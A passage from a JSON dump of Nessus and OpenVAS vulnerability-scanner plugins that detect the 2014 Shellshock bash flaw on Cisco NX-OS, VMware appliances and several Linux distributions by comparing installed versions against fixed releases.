This\nallows a remote attacker to execute arbitrary code via environment\nvariable manipulation depending on the configuration of the system.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?df19d2c1\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the suggested fixed version referred to in the relevant\nCisco bug ID. Note that some fixed versions have not been released\nyet. Please contact the vendor for details.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7187\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:cisco:nx-os\");\n 
script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"cisco_nxos_version.nasl\");\n script_require_keys(\"Host/Cisco/NX-OS/Version\", \"Host/Cisco/NX-OS/Device\", \"Host/Cisco/NX-OS/Model\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\ndevice = get_kb_item_or_exit(\"Host/Cisco/NX-OS/Device\");\nmodel = get_kb_item_or_exit(\"Host/Cisco/NX-OS/Model\");\nversion = get_kb_item_or_exit(\"Host/Cisco/NX-OS/Version\");\n\nfixed = '';\nbug_ID = '';\n\n# MDS 9000 NX-OS prior to 5.0(8a) / 5.2(8e) / 6.2(9a)\nif (device == 'MDS' && model =~ \"^9[0-9][0-9][0-9]([^0-9]|$)\")\n{\n bug_ID = 'CSCur01099';\n\n if (\n version =~ \"^[2-4]\\.\" ||\n version =~ \"^5\\.0\\([0-7][A-Za-z]?\\)\" ||\n version =~ \"^5\\.0\\(8\\)\"\n ) fixed = '5.0(8a)';\n\n if (\n version =~ \"^5\\.2\\([0-7][A-Za-z]?\\)\" ||\n version =~ \"^5\\.2\\(8[A-Da-d]?\\)\"\n ) fixed = '5.2(8e)';\n\n if (\n version =~ \"^6\\.2\\([0-8][A-Za-z]?\\)\" ||\n version =~ \"^6\\.2\\(9\\)\"\n ) fixed = '6.2(9a)';\n}\n\n# Nexus 1000V, only valid known version affected is 5.2(1)SV3(1.1)\nif (device == 'Nexus' && model =~ \"^1[0-9][0-9][0-9][Vv]$\")\n{\n bug_ID = 'CSCur04438';\n\n if (\n version =~ \"^5\\.2\\(1\\)SV3\\(1\\.1\\)\"\n ) fixed = 'Contact Vendor';\n}\n\n# Nexus 1010, versions affected are 4.2(1)SP1(6.2), and 9.2(1)SP1(4.8)\nif (device == 'Nexus' && model =~ \"^101[0-9]([^0-9]|$)\")\n{\n bug_ID = 'CSCur04510';\n\n if (\n version =~ \"^4\\.2\\(1\\)SP1\\(6\\.2\\)\" ||\n version =~ \"^9\\.2\\(1\\)SP1\\(4\\.8\\)\"\n ) fixed = '5.2(1)SP1(7.2)';\n}\n\n# Nexus 3000 fixed versions 6.0(2)U2(6) / 6.0(2)U3(4) / 6.0(2)U4(2) / 6.0(2)U5(1)\n# Nexus 3500 fixed versions 6.0(2)A3(4) / 6.0(2)A4(2) / 6.0(2)A5(1)\n# The A5 and U5 versions 
appear to be the first release for those branches.\nif (device == 'Nexus' && model =~ \"^3[0-9][0-9][0-9]([^0-9]|$)\")\n{\n bug_ID = 'CSCur05529';\n\n if (\n version =~ \"^5\\.0\\(3\\)U\" ||\n version =~ \"^6\\.0\\(2\\)U1\\(\" ||\n version =~ \"^6\\.0\\(2\\)U2\\([0-5]\\)\"\n ) fixed = \"6.0(2)U2(6)\";\n\n if (\n version =~ \"^6\\.0\\(2\\)U3\\([0-3]\\)\"\n ) fixed = \"6.0(2)U3(4)\";\n\n if (\n version =~ \"^6\\.0\\(2\\)U4\\([01]\\)\"\n ) fixed = \"6.0(2)U4(2) / 6.0(2)U5(1)\";\n\n if (\n version =~ \"^5\\.0\\(3\\)A\" ||\n version =~ \"^6\\.0\\(2\\)A[12]\\(\" ||\n version =~ \"^6\\.0\\(2\\)A3\\([0-3]\\)\"\n ) fixed = \"6.0(2)A3(4)\";\n\n if (\n version =~ \"^6\\.0\\(2\\)A4\\(1\\)\"\n ) fixed = \"6.0(2)A4(2) / 6.0(2)A5(1)\";\n}\n\n# Nexus 4000 4.1(2)E1(1) known affected release\nif (device == 'Nexus' && model =~ \"^4[0-9][0-9][0-9]([^0-9]|$)\")\n{\n bug_ID = 'CSCur05610';\n\n if (\n version =~ \"^4\\.1\\(2\\)E1\\(1\\)\"\n ) fixed = \"Contact Vendor\";\n}\n\n# Nexus 5000 / 6000, 5.2(1)N1(8a) / 6.0(2)N2(5) / 7.0(3)N1(0.125)\n# 7.0(4)N1(1) / 7.1(0)N1(0.349)\n# Known affected releases\nif (device == 'Nexus' && model =~ \"^56[0-5][0-9][0-9]([^0-9]|$)\")\n{\n bug_ID = 'CSCur05017';\n\n if (\n version =~ \"^5\\.2\\(1\\)N1\\(8a\\)\" ||\n version =~ \"^6\\.0\\(2\\)N2\\(5\\)\" ||\n version =~ \"^7\\.0\\(3\\)N1\\(0\\.125\\)\" ||\n version =~ \"^7\\.0\\(4\\)N1\\(1\\)\" ||\n version =~ \"^7\\.1\\(0\\)N1\\(0\\.349\\)\"\n ) fixed = \"Contact Vendor\";\n}\n\n# Nexus 7000 fixed in 5.2(9a) / 6.1(5a) / 6.2(8b) / 6.2(10) and above\nif (device == 'Nexus' && model =~ \"^7[0-6][0-9][0-9]([^0-9]|$)\")\n{\n bug_ID = 'CSCuq98748';\n\n if (\n version =~ \"^4\\.\" ||\n version =~ \"^5\\.[01]\\(\" ||\n version =~ \"^5\\.2\\([0-9]\\)\"\n ) fixed = \"5.2(9a)\";\n\n if (\n version =~ \"^6\\.0\\(\" ||\n version =~ \"^6\\.1\\([0-4][Aa]?\\)\" ||\n version =~ \"^6\\.1\\(5\\)\"\n ) fixed = \"6.1(5a)\";\n\n if (\n version =~ \"^6\\.2\\([0-8][Aa]?\\)\"\n ) fixed = \"6.2(8b) / 6.2(10)\";\n}\n\n# Nexus 9000 
known affected 6.1(2)I2(2b) / 7.2(0.1)VB(0.1)\n# Nexus 9000 ACI version prior to 11.0(1d) affected\nif (device == 'Nexus' && model =~ \"^9[0-6][0-9][0-9]([^0-9]|$)\")\n{\n if (\n version =~ \"^6\\.1\\(2\\)I2\\(2b\\)\" ||\n version =~ \"^7\\.2\\(0\\.1\\)VB\\(0\\.1\\)\"\n )\n {\n bug_ID = 'CSCur02700';\n fixed = \"6.1(2)I3(1)\";\n }\n\n if (\n version =~ \"^11\\.0\\(1[bc]\\)\"\n )\n {\n bug_ID = 'CSCur02102';\n fixed = \"11.0(1d)\";\n }\n}\n\nif (!empty(fixed) && !empty(bug_ID))\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Cisco bug ID : ' + bug_ID +\n '\\n Model : ' + device + ' ' + model +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:58:34", "description": "The version of VMware vCenter Server Appliance installed on the remote host is 5.0 prior to Update 3b, 5.1 prior to Update 2b, or 5.5 prior to Update 2a. It therefore contains a version of bash that is affected by a command injection vulnerability via environment variable manipulation. 
Depending on the configuration of the system, an attacker could remotely execute arbitrary code.", "cvss3": {"score": null, "vector": null}, "published": "2014-10-16T00:00:00", "type": "nessus", "title": "VMware vCenter Server Appliance Bash Remote Code Execution (VMSA-2014-0010) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/a:vmware:vcenter_server_appliance"], "id": "VMWARE_VCENTER_SERVER_APPLIANCE_VMSA-2014-0010.NASL", "href": "https://www.tenable.com/plugins/nessus/78508", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78508);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_bugtraq_id(\n 70103,\n 70137,\n 70152,\n 70154,\n 70165,\n 70166\n );\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"VMSA\", value:\"2014-0010\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"VMware vCenter Server Appliance Bash Remote Code Execution (VMSA-2014-0010) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has a virtualization appliance installed that is\naffected by a command injection vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware vCenter Server Appliance installed on the remote\nhost is 5.0 prior to Update 3b, 5.1 prior to Update 2b, or 5.5 prior\nto Update 
2a. It therefore contains a version of bash that is affected\nby a command injection vulnerability via environment variable\nmanipulation. Depending on the configuration of the system, an\nattacker could remotely execute arbitrary code.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2014-0010.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware vCenter Server Appliance 5.0 Update 3b / 5.1 Update\n2b / 5.5 Update 2a or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7187\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:vcenter_server_appliance\");\n 
script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/VMware vCenter Server Appliance/Version\", \"Host/VMware vCenter Server Appliance/Build\");\n script_require_ports(\"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"Host/VMware vCenter Server Appliance/Version\");\nbuild = get_kb_item_or_exit(\"Host/VMware vCenter Server Appliance/Build\");\n\nif (version == \"5.0.0\")\n{\n fixed_main_ver = \"5.0.0\";\n fixed_build = 2170782;\n}\nelse if (version == \"5.1.0\")\n{\n fixed_main_ver = \"5.1.0\";\n fixed_build = 2170517;\n}\nelse if (version == \"5.5.0\")\n{\n fixed_main_ver = \"5.5.0\";\n fixed_build = 2170515;\n}\nelse audit(AUDIT_NOT_INST, \"VMware vCenter Server Appliance 5.0.x / 5.1.x / 5.5.x\");\n\nif (int(build) < fixed_build)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Installed version : ' + version + ' Build ' + build +\n '\\n Fixed version : ' + fixed_main_ver + ' Build ' + fixed_build + \n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, 'VMware vCenter Server Appliance', version + ' Build ' + build);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:58:14", "description": "The VMware vSphere Replication installed on the remote host is version 5.1.x prior to 5.1.2.2, 5.5.x prior to 5.5.1.3, 5.6.x prior to 5.6.0.2, or 5.8.x prior to 5.8.0.1. 
It is, therefore, affected by a command injection vulnerability in GNU Bash known as Shellshock, which is due to the processing of trailing strings after function definitions in the values of environment variables. This allows a remote attacker to execute arbitrary code via environment variable manipulation depending on the configuration of the system", "cvss3": {"score": null, "vector": null}, "published": "2014-10-31T00:00:00", "type": "nessus", "title": "VMware vSphere Replication Bash Environment Variable Command Injection Vulnerability (VMSA-2014-0010) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["x-cpe:/a:vmware:vsphere_replication"], "id": "VMWARE_VSPHERE_REPLICATION_VMSA_2014_0010.NASL", "href": "https://www.tenable.com/plugins/nessus/78771", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78771);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_bugtraq_id(\n 70103,\n 70137,\n 70152,\n 70154,\n 70165,\n 70166\n );\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"EDB-ID\", value:\"34860\");\n script_xref(name:\"VMSA\", value:\"2014-0010\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"VMware vSphere Replication Bash Environment Variable Command Injection Vulnerability (VMSA-2014-0010) (Shellshock)\");\n\n 
script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has a virtualization appliance installed that is\naffected by Shellshock.\");\n script_set_attribute(attribute:\"description\", value:\n\"The VMware vSphere Replication installed on the remote host is version\n5.1.x prior to 5.1.2.2, 5.5.x prior to 5.5.1.3, 5.6.x prior to\n5.6.0.2, or 5.8.x prior to 5.8.0.1. It is, therefore, affected by a\ncommand injection vulnerability in GNU Bash known as Shellshock, which\nis due to the processing of trailing strings after function\ndefinitions in the values of environment variables. This allows a\nremote attacker to execute arbitrary code via environment variable\nmanipulation depending on the configuration of the system\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2014-0010.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to vSphere Replication 5.1.2.2 / 5.5.1.3 / 5.6.0.2 / 5.8.0.1\nor later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7187\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n 
script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/31\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/a:vmware:vsphere_replication\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/VMware vSphere Replication/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"Host/VMware vSphere Replication/Version\");\nverui = get_kb_item_or_exit(\"Host/VMware vSphere Replication/VerUI\");\nbuild = get_kb_item_or_exit(\"Host/VMware vSphere Replication/Build\");\n\nfix = '';\n\nif (version =~ '^5\\\\.1\\\\.' && int(build) < 2170306) fix = '5.1.2 Build 2170306';\nelse if (version =~ '^5\\\\.5\\\\.' && int(build) < 2170307) fix = '5.5.1 Build 2170307';\nelse if (version =~ '^5\\\\.6\\\\.' && int(build) < 2172161) fix = '5.6.0 Build 2172161';\nelse if (version =~ '^5\\\\.8\\\\.' 
&& int(build) < 2170514) fix = '5.8.0 Build 2170514';\n\nif (!empty(fix))\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Installed version : ' + verui +\n '\\n Fixed version : ' + fix + \n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, 'VMware vSphere Replication', verui);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:37:47", "description": "The remote host is missing an update for the 'bash' package(s) announced via the referenced advisory.", "cvss3": {}, "published": "2014-10-01T00:00:00", "type": "openvas", "title": "Ubuntu Update for bash USN-2363-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310841987", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841987", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_2363_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for bash USN-2363-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.841987\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-01 16:57:38 +0530 (Wed, 01 Oct 2014)\");\n script_cve_id(\"CVE-2014-7169\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu Update for bash USN-2363-1\");\n script_tag(name:\"insight\", value:\"Tavis Ormandy discovered that the security fix for Bash included in\nUSN-2362-1 was incomplete. An attacker could use this issue to bypass\ncertain environment restrictions. 
(CVE-2014-7169)\");\n script_tag(name:\"affected\", value:\"bash on Ubuntu 14.04 LTS,\n Ubuntu 12.04 LTS,\n Ubuntu 10.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"USN\", value:\"2363-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2363-1/\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|12\\.04 LTS|10\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"bash\", ver:\"4.3-7ubuntu1.2\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"bash\", ver:\"4.2-2ubuntu2.3\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"bash\", ver:\"4.1-2ubuntu3.2\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:13", "description": "Check the version of bash", "cvss3": {}, "published": 
"2014-10-06T00:00:00", "type": "openvas", "title": "Fedora Update for bash FEDORA-2014-12202", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310868358", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868358", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for bash FEDORA-2014-12202\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868358\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-06 05:56:22 +0200 (Mon, 06 Oct 2014)\");\n script_cve_id(\"CVE-2014-7169\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Update for bash FEDORA-2014-12202\");\n script_tag(name:\"summary\", value:\"Check the version of bash\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"bash on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-12202\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-October/139900.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if 
((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.2.51~2.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:55", "description": "Oracle Linux Local Security Checks ELSA-2014-3077", "cvss3": {}, "published": "2015-10-06T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2014-3077", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310123301", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123301", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2014-3077.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123301\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:01:58 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2014-3077\");\n script_tag(name:\"insight\", value:\"ELSA-2014-3077 - bash security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2014-3077\");\n script_xref(name:\"URL\", 